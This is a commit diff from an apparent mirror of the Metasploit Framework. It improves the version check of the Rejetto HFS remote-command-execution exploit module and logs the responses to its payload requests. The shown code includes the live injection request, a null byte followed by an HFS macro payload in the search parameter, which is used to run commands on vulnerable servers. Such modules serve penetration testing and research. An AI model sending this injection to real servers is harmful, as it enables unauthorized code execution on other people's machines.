infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Improve check method

bug/bundler_fix
jvazquez-r7 2014-10-08 12:03:16 -05:00
parent 25344aeb6a
commit d90fe4f724
1 changed files with 12 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
modules/exploits/windows/http/rejetto_hfs_exec.rb
View File

@ -60,11 +60,16 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => '/'
})
if res && res.headers['Server'] && res.headers['Server'] =~ /HFS 2\.3/
if res && res.headers['Server'] && res.headers['Server'] =~ /HFS ([\d.]+)/
version = $1
if Gem::Version.new(version) <= Gem::Version.new("2.3")
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
else
return Exploit::CheckCode::Safe
end
end
def on_request_uri(cli, req)
@ -98,10 +103,13 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Sending a malicious request to #{target_uri.path}")
payloads.each do |payload|
send_request_raw({
res = send_request_raw({
'method' => 'GET',
'uri' => "/?search=%00{.#{URI::encode(payload)}.}"
})
if res
print_status("#{res.code}\n#{res.body.to_s}")
end
end
register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_full_name}")
end